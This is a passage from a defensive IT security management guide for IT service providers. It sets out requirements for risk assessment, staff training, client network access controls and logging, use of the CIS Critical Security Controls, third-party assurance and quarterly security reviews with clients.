As described in the Summary, basic IT security management practices lie in the following six domains:
- IT Service Provider Information Security Management
- Information Security Subject Matter Expertise
- Security Management of the IT Interface
- Security Management of the IT Network: Use of CIS Critical Security Controls
- 3rd-Party Security Assurance
- Information Security Review with Clients
These are described below.
IT Service Provider Information Security Management
The IT Service Provider manages its own information security by means of a formal documented Information Security Management Program [1] designed to protect the confidentiality, integrity and availability of its information and the information of its clients in accordance with commercially reasonable information security management standards appropriate for a company with its security-risk profile and the security-risk profiles of its clients.
The IT Service Provider’s Information Security Management Program is based on an Information Risk Assessment
- The IT Service Provider conducts a periodic risk assessment, at least annually, of its information systems sufficient to inform the design of its information security management program.
- The IT Service Provider updates its risk assessment as reasonably necessary to address changes to its information systems, nonpublic information of clients and others, or business operations.
- The IT Service Provider’s risk assessment considers the particular risks of the its business operations related to cybersecurity, nonpublic information of clients and others, information systems utilized, and the availability and effectiveness of controls to protect client and other nonpublic information and information systems.
- The IT Service Provider carries out its risk assessment in accordance with written policies and procedures, including:
- Documented criteria for evaluating and categorizing identified cybersecurity risks or threats facing the it organization and its clients;
- Documented criteria for assessing assurance of confidentiality, integrity, and availability of information systems and nonpublic information.
- Documentation describing how identified risks are mitigated, accepted, or otherwise addressed based on the risk assessment.
- The organization documents its risk assessment.
The IT Service Provider’s Information Security Management Program is designed to perform the following core cybersecurity functions: [2]
- Identify and assess internal and external cybersecurity risks that may threaten the security of client information or nonpublic information stored on its information system
- Protect client information and nonpublic information stored on those information systems from unauthorized access, use or other malicious acts through physical, administrative and technical controls, including the implementation of policies and procedures.
- Ability to detect cybersecurity events and alert appropriate personnel.
- Ability to respond to identified or detected cybersecurity events to mitigate any negative effects and restore operations.
- Ability to recover from cybersecurity events and restore normal operations and services.
The IT Service Provider’s information security management program is managed by an Information Security Manager, appointed by Executive management, and responsible and accountable for managing the organization’s information security management program.
The Information Security Manager is supported by a cross-functional steering committee and subject matter expertise. Executive management provides the Information Security Manager with appropriate resources and regularly reviews the information security program.
The IT Service Provider has a program for identifying, documenting and controlling sensitive information with access to information based upon the twin concepts of least privilege and need-to-know.
The IT Service Provider has an information security awareness and education program so that all staff receives information security awareness training at least annually, and are periodically trained in phishing defense.
The IT Service Provider has formal documented standards for ensuring that 3rd-parties with which it shares information secure it in accordance with documented standards that are at least as strong as the standards described in this document.
The IT Service Provider has formal documented standards, processes and procedures for managing the security of its own IT infrastructure in accordance with the Center for Internet Security (CIS) Critical Security Controls (See below). These standards document, for each control, how – and to what extent – the organization meets that control. As the organization may have different clients with different security needs, the IT Service Provider’s security standards are to meet the highest standard of any of its customers. [3]
The IT Service Provider has documented incident response and business continuity plans that are tested at least annually. The organization’s Incident Response plan calls for client notification as soon as possible in the event of a suspected breach or other security incident.
The IT Service Provider measures its information security performance through metrics that are published at least quarterly to its clients.
IT Service Provider Information Security Subject Matter Expertise
The IT Service Provider has appropriate information security subject matter expertise or access to that expertise.
The IT Service Provider has either a Certified Information Systems Security Professional (CISSP) on staff or utilizes one through an ongoing consulting relationship. [4]
All technical staff receive a minimum of 16 hours per year of information security continuing education.
Information security continuing education includes educational activities in areas such as the following;
- Security and Risk Management
- Asset Security
- Access Controls
- Security Engineering
- Communication and Network Security
- Identity and Access Management
- Security Assessment and Testing
- Security Operations
- Software Development Security
- Penetration Testing
- Risk Identification, Monitoring, and Analysis
- Incident Response, Recovery and Resilience
- Information Security Management Frameworks
- Information Continuity
- Other Advanced Technology Management Programs
Qualifying CPE activities include activities such as:
- Attending educational courses or seminars, such as those offered
- Attending security conferences
- Being an active member of an information security association chapter
- Completing university/college courses
- Providing security training
- Publishing security articles or books
- Serving on industry boards
- Self-study, if properly rigorous and documented
- Volunteer work on behalf of information security professional associations such as (ISC)², ISSA, ISACA, and the Cloud Security Alliance
There are numerous organizations offering continuing education. These include:
- Colleges and Universities
- The SANS Institute
- (ISC)²
- ISSA
- ISACA
- CompTIA
As a general rule, the training courses offered by solution providers on configuring their solutions do not qualify as continuing education.
IT Service Provider Management of the Client IT Interface
All access by the IT Service Provider to a client’s network is protected in accordance with appropriate documented procedures, access is identifiable to a specific person, and audit logs (records) are recorded and securely maintained.
All of the IT Service Provider’s technical personnel having access to a client’s IT network connect via individual user-accounts. The organization does not use shared accounts for access to its clients’ IT networks.
All remote access by the IT Service Provider to a clients’ IT network is through a Virtual Private Network (VPN) with two-factor authentication. VPNs are configured with no split tunneling. There is no direct remote access to internal servers from the Internet.
User passwords providing access to a client’s IT network are a minimum of 15 characters in length, composed of all 4 character sets: upper case, lower case, number, and character.
All access and behavior by IT the Service Provider’s staff on a client’s IT network is logged. All logs are traceable to a specific individual. IT Service Provider logs include at least the following: user identification, type of event, event time, success or failure indication, origination of event, and identity or name of affected data, system component, or resource.
Logs are stored in a secure manner using, for example, a syslog server. Logs are protected from unauthorized modification.[5] Logs are stored for a minimum of 365 days.
The IT Service Provider reviews all administrative accounts with access to its clients’ IT networks at least every 90 days to ensure that staff permissions remain correct.
IT Service Provider Security Management of the Client’s IT Network; Use of CIS Critical Security Controls
The IT Service Provider manages the security of its clients’ IT networks in accordance with commercially acceptable IT security management standards, at least as strong as those described below.
Use of CIS Critical Security Controls: The IT Service Provider has formal documented standards, processes and procedures for managing the security of its clients’ IT infrastructures in accordance with the Mapping of CIS Controls to STV Basic Guide, based on Center for Internet Security (CIS) Critical Security Controls.
Documentation includes the technical or other standards in-place for implementing the control, the procedures used to configure and implement the control, and the processes used to ensure the control is followed.
There are 20 Critical Security Controls in the CIS Framework, each of which is based upon a set of sub-controls. The SecureTheVillage Guide uses these sub-controls as the basis for managing a client’s network.
As documented in the Mapping of CIS Controls to STV Basic Guide, each Sub-Control is either Required, Addressable, or Mixed.
If a sub-control is listed as required, then compliance with the Guide requires the IT organization to implement the control.
If a sub-control is listed as addressable, then compliance with the Guide requires the organization to either implement the control or, if it doesn’t fully implement the control, that its documented security management standards include:
- A description of why the organization doesn’t implement the control
- The compensating controls the organization has in place to appropriately meet the intent of the sub-control
Some sub-controls contain both a required component and an addressable component. These are indicated in the Mapping of CIS Controls to STV Basic Guide.
Example of a Required Sub-Control: The Guide requires an IT organization to implement the following sub-control without exception.
Critical Security Control #9: Limitation and Control of Network Ports
Sub-Control 9.1: Ensure that only ports, protocols, and services with validated business needs are running on each system.
Example of an Addressable Sub-Control:
Critical Security Control #2: Inventory of Authorized and Unauthorized Software
Sub-Control 2.2: Deploy application whitelisting technology that allows systems to run software only if it is included on the whitelist and prevents execution of all other software on the system. The whitelist may be very extensive (as is available from commercial whitelist organizations), so that users are not inconvenienced when using common software. Or, for some special-purpose systems (which require only a small number of programs to achieve their needed business functionality), the whitelist may be quite narrow.
Sub-control 2.2 is addressable rather than required as this control is, in general, not commercially reasonable for mid-market and smaller companies.
Example of a Mixed Required-Addressable Sub-Control:
Critical Security Control #2: Inventory of Authorized and Unauthorized Software
Sub-Control 2.1: Devise a list of authorized software and version that is required in the enterprise for each type of system, including servers, workstations, and laptops of various kinds and uses. This list should be monitored by file integrity checking tools to validate that the authorized software has not been modified.
Required: Devise a list of authorized software and version that is required in the enterprise for each type of system, including servers, workstations, and laptops of various kinds and uses.
Addressable: This list should be monitored by file integrity checking tools to validate that the authorized software has not been modified.
This second clause in #2.1 is addressable rather than required as file integrity checking tools are often not commercially reasonable for smaller companies.
IT Service Provider 3rd-Party Security Assurance
The IT Service Provider follows a formal documented process based upon the Center for Internet Security (CIS) Critical Security Controls to ensure the security of 3rd-parties who will have access to customer information or information systems. This includes:
- Solution organizations
- 3rd-Party applications
- Data centers
- Cloud service providers (SaaS, etc.)
- Cloud infrastructure (Amazon S3, Azure, etc.)
- Backup/recovery systems
- Disaster recovery sites
- Telco and Mobile Service Providers
Information Security Review with Clients
The IT Service Provider meets periodically with each client, at least quarterly, to review the client’s information security profile.
- Material cybersecurity events during the time period addressed by the report.
- Changes in the cyber security threat environment, in particular in relation to the client’s risk exposure.
- Cybersecurity risks.
- Overall effectiveness of current security controls, including strengths and weaknesses.
- Recommendations for improving security management, including recommendations that the client implement the organization’s security capabilities.
[1] In the language of the International Information Security Standard, ISO 27001, this is called an Information Security Management System. An Information Security Management System (ISMS) is a systematic and structured approach to managing information security. ISMS implementation includes policies, processes, procedures, organizational structures, education and training programs, relationships with vendors, and the software and hardware functions mediating the flow and control of information. As described in Information Security Standard, ISO 27001, an ISMS implementation should be directly influenced by the organization’s objectives, security requirements, processes employed, size and structure. See https://www.iso.org/isoiec-27001-information-security.html.
[2] These five core functions are described in the Framework for Improving Critical Infrastructure Cybersecurity by the National Institute of Standards and Technology (NIST). See https://www.nist.gov/cyberframework.
[3] From the CIS website: “The CIS Critical Security Controls (CIS Controls) are a concise, prioritized set of cyber practices created to stop today’s most pervasive and dangerous cyber attacks. The CIS Controls are developed, refined, and validated by a community of leading experts from around the world. Organizations that apply just the first five CIS Controls can reduce their risk of cyberattack by around 85 percent. Implementing all 20 CIS Controls increases the risk reduction to around 94 percent…. The CIS Controls embrace the Pareto 80/20 Principle, the idea that taking just a small portion of all the security actions you could possibly take, yields a very large percentage of the benefit of taking all those possible actions.” https://www.cisecurity.org/critical-controls.cfm.
[4] See https://www.isc2.org/cissp/default.aspx.
[5] One strategy for doing this is to set audit files to read-only and audit for whenever permissions change on that file. Another is to use file integrity monitoring/change detection software on logs to ensure that existing log data cannot be changed without generating alerts.